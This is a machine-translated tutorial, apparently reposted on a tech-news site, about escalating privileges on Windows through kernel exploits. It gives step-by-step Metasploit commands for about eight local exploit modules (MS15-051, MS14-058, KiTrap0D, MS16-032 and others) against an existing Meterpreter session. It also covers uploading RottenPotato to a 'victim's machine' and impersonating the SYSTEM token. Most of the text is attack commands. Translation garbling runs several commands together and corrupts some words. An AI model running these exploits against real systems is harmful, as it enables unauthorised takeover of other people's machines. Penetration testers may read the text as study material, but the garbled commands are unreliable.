Shulou(Shulou.com)06/02 Report--

How to carry out Windows kernel vulnerability exploitation rights, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

"using automated scripts to elevate Windows rights", this article will introduce the methods of Windows kernel vulnerability lifting. I will use the built-in Metasploit module as a demonstration.

Windows-Exploit-suggester

The Metasploit built-in module provides a variety of local exploits that can be used to claim rights, and provides recommendations based on architecture, platform (that is, the operating system running), session type, and required default options. This saves us a lot of time and the hassle of manually searching local exploits. That said, not all of the listed local exploits are available. Therefore, whether it is to exploit or find the best way is to automatically combine manual.

Usage

Note: to use local exploit suggester, we must have obtained a Meterpreter session on the target machine. Before running Local Exploit suggester, we need to transfer the existing Meterpreter session to run in the background (CTRL + Z)

For example, suppose we now have a Meterpreter session 1

Use post/multi/recon/local_exploit_suggesterset LHOST 192.168.1.107set SESSION 1exploit

As shown in the following figure, it automatically matches some possible exploit modules for vulnerable targets.

Windows ClientCopyImage Win32k Exploit

Windows kernel mode driver privilege escalation vulnerability. This module takes advantage of incorrect object handling in the win32k.sys kernel mode driver to elevate rights.

This module has been tested on vulnerable versions of Windows 7 x64 and x86 Windows 2008 R2 SP1 x64.

Let's go to the MSF console and execute the exploit module for this vulnerability

Use exploit/windows/local/ms15_051_client_copy_imageset lhost 192.168.1.107set session 1exploit

Once the exploit is successfully executed, another Meterpreter session will be opened

Getsystemgetuid

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

Windows TrackPopupMenu Win32k NULL pointer dereferencing

This module takes advantage of NULL pointer dereference in win32k.sys, and the vulnerability can be triggered by the TrackPopupMenu function. In special cases, we can misuse the NULL pointer on xxxSendMessageTimeout to dereference to achieve arbitrary code execution.

The module has been tested on Windows XP SP3,Windows Server 2003 SP2,Windows 7 SP1 Windows Server 2008 32-bit and Windows Server 2008 R2 SP1 64-bit.

Let's go to the MSF console and execute the exploit module for this vulnerability

Use exploit/windows/local/ms14_058_track_popup_menuset lhost 192.168.1.107set session 1exploit

Once the exploit is successfully executed, another Meterpreter session will be opened

Getsystemgetuid

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

Elevate Windows permissions through KiTrap0D

This module will create a new session with SYSTEM permissions through KiTrap0D exploit, and exploit will not run if the session permissions currently in use have been elevated. This module relies on kitrap0d.x86.dll and is therefore not supported on the x64 version of Windows.

This module has been tested on 32-bit Windows Server 2003 Magi Server 2008 Magi Windows 7 and XP vulnerable versions.

Let's go to the MSF console and execute the exploit module for this vulnerability

Use exploit/windows/local/ms10_015_kitrap0dset lhost 192.168.1.107set session 1exploit

Once the exploit is successfully executed, another Meterpreter session will be opened

Getsystemgetuid

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

Task Scheduler XML raises the right

This vulnerability occurs in Task Scheduler and may allow users to escalate privileges. If an attacker logs in to the affected system and runs a specially crafted application, the vulnerability may allow for privilege escalation. An attacker must have valid login credentials and be able to log in locally to successfully exploit this vulnerability. Remote or anonymous users cannot exploit this vulnerability.

This module has been tested on vulnerable versions of Windows Vista,Windows 7 Magi Windows Server 2008 x64 and x86.

Let's go to the MSF console and execute the exploit module for this vulnerability

Use exploit/windows/local/ms10_092_schelevatorset lhost 192.168.1.107set session 1exploit

Once the exploit is successfully executed, another Meterpreter session will be opened

Getsystemgetuid

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

MS16-016mrxdav.sys WebDav Local Lighting

This module exploits a vulnerability in mrxdav.sys. It will generate a process on the target system and elevate its permissions to NT AUTHORITY\ SYSTEM before executing payload.

This module has been tested on a vulnerable version of the Windows 7 SP1,x86 architecture.

Let's go to the MSF console and execute the exploit module for this vulnerability

Use exploit/windows/local/ms16_016_webdavset lhost 192.168.1.107set session 1exploit

Once the exploit is successfully executed, another Meterpreter session will be opened

Getsystemgetuid

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

EPATHOBJ::pprFlattenRec local rights increase

This module exploits a vulnerability in EPATHOBJ:: pprFlattenRec, whose main problem is the use of uninitialized data (that is, allowing memory corruption).

At present, the module has been successfully tested on Windows XP SP3,Windows 2003 SP1 and Windows 7 SP1.

Let's go to the MSF console and execute the exploit module for this vulnerability

Use exploit/windows/local/ppr_flatten_recset lhost 192.168.1.107set session 1exploit

Once the exploit is successfully executed, another Meterpreter session will be opened

Getsystemgetuid

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

MS13-053: NTUserMessageCall Win32k kernel pool overflow

A kernel pool overflow vulnerability in Win32k allows local users to escalate rights. The kernel shellcode makes the ACL of the winlogon.exe process NULL (SYSTEM process). This will allow any unprivileged process to migrate freely to winlogon.exe, thereby elevating user privileges. Note: exiting a meterpreter session may cause winlogon.exe to crash.

Currently, the module has been successfully tested on Windows 7 SP1 x86.

Let's go to the MSF console and execute the exploit module for this vulnerability

Use exploit/windows/local/ms13_053_ schlampereiset lhost 192.168.1.107set session 1exploit

Once the exploit is successfully executed, another Meterpreter session will be opened

Getsystemgetuid

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

MS16-032Secondary Logon Handle raises the right

This module takes advantage of the lack of standard handle filtering in Windows Secondary Logon Service. This vulnerability mainly affects the 64-bit version of Windows 7-10 and 2k8-2k12 32 Universe. This module is only available for Windows systems with Powershell version 2.0 or later, and for systems with at least two or more CPU cores.

Use exploit/windows/local/ms16_032_secondary_logon_handle_privescset session 1exploit

Once the exploit is successfully executed, another Meterpreter session will be opened

Getsystemgetuid

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

RottenPotato

Use RottenPotato to locally elevate the service account to SYSTEM.

First, we use the following options in the meterpreter session to see if any valid tokens exists on the current system.

Load incognitolist_token-u

As you can see, there is currently no token available.

Now, let's download Rottenpotato from github.

Git clone https://github.com/foxglovesec/RottenPotato.gitcd RottenPotato

When the download is complete, we will see a rottenpotato.exe file in the Rottenpotato directory.

Upload the file to the victim's machine.

Upload / root/Desktop/RottenPotato/rottenpotato.exe.

Then, type the following command to execute the exe file and add SYSTEM token under impersonate user tokens.

Execute-Hc-f rottenpotato.exeimpersonate_token "NT AUTHORITY\\ SYSTEM"

As you can see, our current user rights have been upgraded to NT AUTHORITY\ SYSTEM

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.